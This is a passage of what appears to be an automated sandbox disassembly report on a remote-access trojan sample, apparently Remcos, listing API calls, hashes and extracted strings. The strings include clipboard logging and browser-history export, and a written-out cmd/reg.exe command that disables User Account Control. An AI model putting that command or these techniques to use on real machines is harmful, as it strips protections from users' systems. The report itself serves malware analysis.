                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041990F,00000000,00000000), ref: 00419F69
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041990F,00000000,00000000), ref: 00419F6C
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          APIs
                                                          • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412AF5
                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412B24
                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412BC5
                                                          Similarity
                                                          • API ID: Enum$InfoQueryValue
                                                          • String ID: [regsplt]$TG
                                                          • API String ID: 3554306468-170812940
                                                          Similarity
                                                          • API ID:
                                                          • String ID: E
                                                          • API String ID: 0-2089609516
                                                          APIs
                                                            • Part of subcall function 0041265C: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 0041267E
                                                            • Part of subcall function 0041265C: RegQueryValueExW.ADVAPI32(?,0040E18D,00000000,00000000,?,00000400), ref: 0041269D
                                                            • Part of subcall function 0041265C: RegCloseKey.ADVAPI32(?), ref: 004126A6
                                                            • Part of subcall function 0041B366: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B377
                                                            • Part of subcall function 0041B366: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B37E
                                                          • _wcslen.LIBCMT ref: 0041AB01
                                                          Similarity
                                                          • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                          • String ID: .exe$http\shell\open\command$program files (x86)\$program files\
                                                          • API String ID: 3286818993-4246244872
                                                          APIs
                                                            • Part of subcall function 00433724: EnterCriticalSection.KERNEL32(00471D18,?,00476D54,?,0040AE8B,00476D54,?,00000000,00000000), ref: 0043372F
                                                            • Part of subcall function 00433724: LeaveCriticalSection.KERNEL32(00471D18,?,0040AE8B,00476D54,?,00000000,00000000), ref: 0043376C
                                                            • Part of subcall function 00433AB0: __onexit.LIBCMT ref: 00433AB6
                                                          • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                            • Part of subcall function 004336DA: EnterCriticalSection.KERNEL32(00471D18,00476D54,?,0040AEAC,00476D54,00456FA7,?,00000000,00000000), ref: 004336E4
                                                            • Part of subcall function 004336DA: LeaveCriticalSection.KERNEL32(00471D18,?,0040AEAC,00476D54,00456FA7,?,00000000,00000000), ref: 00433717
                                                          Similarity
                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                          • String ID: [End of clipboard]$[Text copied to clipboard]$TmG$XmG
                                                          • API String ID: 2974294136-1855599884
                                                          APIs
                                                          • RegisterClassExA.USER32(00000030), ref: 0041CC77
                                                          • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CC92
                                                          • GetLastError.KERNEL32 ref: 0041CC9C
                                                          Similarity
                                                          • API ID: ClassCreateErrorLastRegisterWindow
                                                          • String ID: 0$MsgWindowClass
                                                          • API String ID: 2877667751-2410386613
                                                          APIs
                                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                          • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                          • CloseHandle.KERNEL32(?), ref: 00406A14
                                                          Strings
                                                          • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                          Similarity
                                                          • API ID: CloseHandle$CreateProcess
                                                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                          • API String ID: 2922976086-4183131282
                                                          Strings
                                                          • Rmc-JLQBNY, xrefs: 0040693F
                                                          • C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, xrefs: 00406927
                                                          Similarity
                                                          • API ID:
                                                          • String ID: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe$Rmc-JLQBNY
                                                          • API String ID: 0-2036069771
                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044279A,?,?,0044273A,?,0046EAF0,0000000C,00442891,?,00000002), ref: 00442809
                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044281C
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,0044279A,?,?,0044273A,?,0046EAF0,0000000C,00442891,?,00000002,00000000), ref: 0044283F
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,004755B0,00414F47,00000000,00000000,00000001), ref: 00404AED
                                                          • SetEvent.KERNEL32(00000304), ref: 00404AF9
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404B04
                                                          • CloseHandle.KERNEL32(00000000), ref: 00404B0D
                                                            • Part of subcall function 0041A891: GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                          Similarity
                                                          • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                          • String ID: KeepAlive | Disabled
                                                          • API String ID: 2993684571-305739064
                                                          APIs
                                                            • Part of subcall function 0041A891: GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                          • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041A15A
                                                          • PlaySoundW.WINMM(00000000,00000000), ref: 0041A168
                                                          • Sleep.KERNEL32(00002710), ref: 0041A16F
                                                          • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041A178
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Similarity
                                                          • API ID: PlaySound$HandleLocalModuleSleepTime
                                                          • String ID: Alarm triggered
                                                          • API String ID: 614609389-2816303416
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041C10D), ref: 0041C084
                                                          • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041C10D), ref: 0041C091
                                                          • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041C10D), ref: 0041C09E
                                                          • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041C10D), ref: 0041C0B1
                                                          Strings
                                                          • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041C0A4
                                                          Similarity
                                                          • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                          • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                          • API String ID: 3024135584-2418719853
                                                          APIs
                                                            • Part of subcall function 00410691: SetLastError.KERNEL32(0000000D,00410C10,?,00000000), ref: 00410697
                                                          • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410BED), ref: 00410C9C
                                                          • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410D02
                                                          • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410D09
                                                          • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410E17
                                                          • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410BED), ref: 00410E41
                                                          Similarity
                                                          • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                          • String ID:
                                                          • API String ID: 3525466593-0
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E5FD,?,00000000,?,00000001,?,?,00000001,0043E5FD,?), ref: 00450130
                                                          • __alloca_probe_16.LIBCMT ref: 00450168
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004501B9
                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00439BCF,?), ref: 004501CB
                                                          • __freea.LIBCMT ref: 004501D4
                                                            • Part of subcall function 00446D0F: RtlAllocateHeap.NTDLL(00000000,00434613,?,?,00437437,?,?,?,?,?,0040CD5A,00434613,?,?,?,?), ref: 00446D41
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                          • String ID:
                                                          • API String ID: 313313983-0
                                                          APIs
                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0044E354
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E377
                                                            • Part of subcall function 00446D0F: RtlAllocateHeap.NTDLL(00000000,00434613,?,?,00437437,?,?,?,?,?,0040CD5A,00434613,?,?,?,?), ref: 00446D41
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E39D
                                                          • _free.LIBCMT ref: 0044E3B0
                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E3BF
                                                          Similarity
                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                          • String ID:
                                                          • API String ID: 336800556-0
                                                          APIs
                                                          • GetLastError.KERNEL32(0000000A,0000000B,0000000A,00445569,00440CA8,00000000,?,?,?,?,00440E8B,00000000,0000000A,000000FF,0000000A,00000000), ref: 00447158
                                                          • _free.LIBCMT ref: 0044718D
                                                          • _free.LIBCMT ref: 004471B4
                                                          • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 004471C1
                                                          • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 004471CA
                                                          Similarity
                                                          • API ID: ErrorLast$_free
                                                          • String ID:
                                                          • API String ID: 3170660625-0
                                                          APIs
                                                          • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B5A0
                                                          • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B5B3
                                                          • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041B5D3
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B5DE
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B5E6
                                                          Similarity
                                                          • API ID: Process$CloseHandleOpen$FileImageName
                                                          • String ID:
                                                          • API String ID: 2951400881-0
                                                          APIs
                                                          • _free.LIBCMT ref: 0044F9C5
                                                            • Part of subcall function 00446CD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A), ref: 00446CEB
                                                            • Part of subcall function 00446CD5: GetLastError.KERNEL32(0000000A,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A,0000000A), ref: 00446CFD
                                                          • _free.LIBCMT ref: 0044F9D7
                                                          • _free.LIBCMT ref: 0044F9E9
                                                          • _free.LIBCMT ref: 0044F9FB
                                                          • _free.LIBCMT ref: 0044FA0D
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          APIs
                                                          • _free.LIBCMT ref: 00443515
                                                            • Part of subcall function 00446CD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A), ref: 00446CEB
                                                            • Part of subcall function 00446CD5: GetLastError.KERNEL32(0000000A,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A,0000000A), ref: 00446CFD
                                                          • _free.LIBCMT ref: 00443527
                                                          • _free.LIBCMT ref: 0044353A
                                                          • _free.LIBCMT ref: 0044354B
                                                          • _free.LIBCMT ref: 0044355C
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          APIs
                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 0041694E
                                                          • GetWindowTextW.USER32(?,?,0000012C), ref: 00416980
                                                          • IsWindowVisible.USER32(?), ref: 00416987
                                                            • Part of subcall function 0041B588: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B5A0
                                                            • Part of subcall function 0041B588: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B5B3
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Similarity
                                                          • API ID: ProcessWindow$Open$TextThreadVisible
                                                          • String ID: 0VG
                                                          • API String ID: 3142014140-3748860515
                                                          • Opcode ID: 8040e70f99a29c17371243be5b0374263071332b934c14761d81ab03223ac4bc
                                                          • Instruction ID: a92d2c2722018a5f2df8734f3a85bf91d45912e01cb50305def5a483f7f9536a
                                                          • Opcode Fuzzy Hash: 8040e70f99a29c17371243be5b0374263071332b934c14761d81ab03223ac4bc
                                                          • Instruction Fuzzy Hash: FE71C3311082415AC335FB61D8A5ADFB3E4EFD4308F50493EB58A530E1EF74AA49CB9A
                                                          APIs
                                                          • _strpbrk.LIBCMT ref: 0044D6B8
                                                          • _free.LIBCMT ref: 0044D7D5
                                                            • Part of subcall function 0043AA64: IsProcessorFeaturePresent.KERNEL32(00000017,0043AA36,00000000,0000000A,0000000A,00000000,0041AF72,00000022,?,?,0043AA43,00000000,00000000,00000000,00000000,00000000), ref: 0043AA66
                                                            • Part of subcall function 0043AA64: GetCurrentProcess.KERNEL32(C0000417,0000000A,00000000), ref: 0043AA88
                                                            • Part of subcall function 0043AA64: TerminateProcess.KERNEL32(00000000), ref: 0043AA8F
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Similarity
                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                          • String ID: *?$.
                                                          • API String ID: 2812119850-3972193922
                                                          • Opcode ID: a944b580e8880c8e130e00bdfc146e92b9e44dab990486ab21efc68c0a65a633
                                                          • Instruction ID: 04f9c45711fae47bd805a28d6c684d852fff3551aaaea8338e0504d4b1d9eb7e
                                                          • Opcode Fuzzy Hash: a944b580e8880c8e130e00bdfc146e92b9e44dab990486ab21efc68c0a65a633
                                                          • Instruction Fuzzy Hash: C251B175E00209AFEF14DFA9C881AAEBBB5EF58314F25416FE854E7301E6399E01CB54
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe,00000104), ref: 00442924
                                                          • _free.LIBCMT ref: 004429EF
                                                          • _free.LIBCMT ref: 004429F9
                                                          Strings
                                                          • C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, xrefs: 0044291B, 00442922, 00442951, 00442989
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Similarity
                                                          • API ID: _free$FileModuleName
                                                          • String ID: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe
                                                          • API String ID: 2506810119-148211918
                                                          • Opcode ID: e43589620df6d0a02bbe9fe69612e96b807286bf84d647a6e2c91bfdc5f7fdb4
                                                          • Instruction ID: 08a660f2d8e46f51ee0862092f41265a48d7a3eaa7bec75f040af8368b354bfd
                                                          • Opcode Fuzzy Hash: e43589620df6d0a02bbe9fe69612e96b807286bf84d647a6e2c91bfdc5f7fdb4
                                                          • Instruction Fuzzy Hash: E53193B1A00258AFEB21DF999E8199EBBBCEB85314F50406BF805A7311D6F84A41CB59
                                                          APIs
                                                          • send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                                          • WaitForSingleObject.KERNEL32(00000310,00000000,{NAL,?,?,00000004,?,?,00000004,00474EE0,004755B0,00000000), ref: 0040450E
                                                          • SetEvent.KERNEL32(00000310,?,?,00000004,?,?,00000004,00474EE0,004755B0,00000000,?,?,?,?,?,00414E7B), ref: 0040453C
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Similarity
                                                          • API ID: EventObjectSingleWaitsend
                                                          • String ID: {NAL
                                                          • API String ID: 3963590051-1903569844
                                                          • Opcode ID: 438a4a486c613dad8f91b4ef8ef70ced317a48407eae681756782b40dc658345
                                                          • Instruction ID: 09920f02ef31e30e393b68ef0c8285e211ae926702cc5adcda46913b737bad1c
                                                          • Opcode Fuzzy Hash: 438a4a486c613dad8f91b4ef8ef70ced317a48407eae681756782b40dc658345
                                                          • Instruction Fuzzy Hash: 552137B29005156BCF04ABA5DC96DEE777CBF54358B00413EF916B21E1EE78A504C6E4
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                            • Part of subcall function 0041AD43: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00466900,0040C07B,.vbs,?,?,?,?,?,00475308), ref: 0041AD6A
                                                            • Part of subcall function 0041789C: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00466324), ref: 004178B2
                                                            • Part of subcall function 0041789C: CloseHandle.KERNEL32($cF,?,?,00403AB9,00466324), ref: 004178BB
                                                            • Part of subcall function 0041B825: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B83E
                                                          • Sleep.KERNEL32(000000FA,00466324), ref: 00403AFC
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Similarity
                                                          • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                          • String ID: /sort "Visit Time" /stext "$0NG
                                                          • API String ID: 368326130-3219657780
                                                          • Opcode ID: b9ea6b50cec41ec040a9f76ae8369c1ad19d6b37305134aedebb5ccf8f56233d
                                                          • Instruction ID: 03df4c4d2d4284c33795d9a7a6d048d6c9d09091ba23d5cef523323604a75e49
                                                          • Opcode Fuzzy Hash: b9ea6b50cec41ec040a9f76ae8369c1ad19d6b37305134aedebb5ccf8f56233d
                                                          • Instruction Fuzzy Hash: 88319531A0011456CB14FB76DC969EE7779AF80318F00007FF906B31D2EF385A4AC699
                                                          APIs
                                                          • _free.LIBCMT ref: 004483ED
                                                          • _free.LIBCMT ref: 00448443
                                                            • Part of subcall function 0044821F: _free.LIBCMT ref: 00448277
                                                            • Part of subcall function 0044821F: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045E478), ref: 00448289
                                                            • Part of subcall function 0044821F: WideCharToMultiByte.KERNEL32(00000000,00000000,0047279C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448301
                                                            • Part of subcall function 0044821F: WideCharToMultiByte.KERNEL32(00000000,00000000,004727F0,000000FF,?,0000003F,00000000,?), ref: 0044832E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Similarity
                                                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                          • String ID: xE
                                                          • API String ID: 314583886-407097786
                                                          • Opcode ID: 9c637a4c831fe7eeac3cdc02b43c82e31c030d80d9709743783fb0f8cc9b1dbe
                                                          • Instruction ID: 75d3a8e9ed6c4df3bbb87a82b1f0f54536a25ed198edf9988c125f258b025633
                                                          • Opcode Fuzzy Hash: 9c637a4c831fe7eeac3cdc02b43c82e31c030d80d9709743783fb0f8cc9b1dbe
                                                          • Instruction Fuzzy Hash: 90213B3280013957F730A7259C46DEF7378DB41724F1102AFEC98A2191EF784DC189AD
                                                          APIs
                                                          • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                          • wsprintfW.USER32 ref: 0040A905
                                                            • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Similarity
                                                          • API ID: EventLocalTimewsprintf
                                                          • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                          • API String ID: 1497725170-1359877963
                                                          • Opcode ID: 2c1e205bf1f5052a51d4638fd4dd379fe1f7b993f8f7852f87f4d6bf88a020b2
                                                          • Instruction ID: eacaba0d290b76b22f399a57737f65b18f8a023abca8575ba11697f47f6457b1
                                                          • Opcode Fuzzy Hash: 2c1e205bf1f5052a51d4638fd4dd379fe1f7b993f8f7852f87f4d6bf88a020b2
                                                          • Instruction Fuzzy Hash: F1115172500118AACB18FB96EC56CFF77B8AE48715B00013FF542621D1EF7C5A86C6E9
                                                          APIs
                                                            • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                            • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                            • Part of subcall function 0041A891: GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                                                          • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Similarity
                                                          • API ID: CreateThread$LocalTime$wsprintf
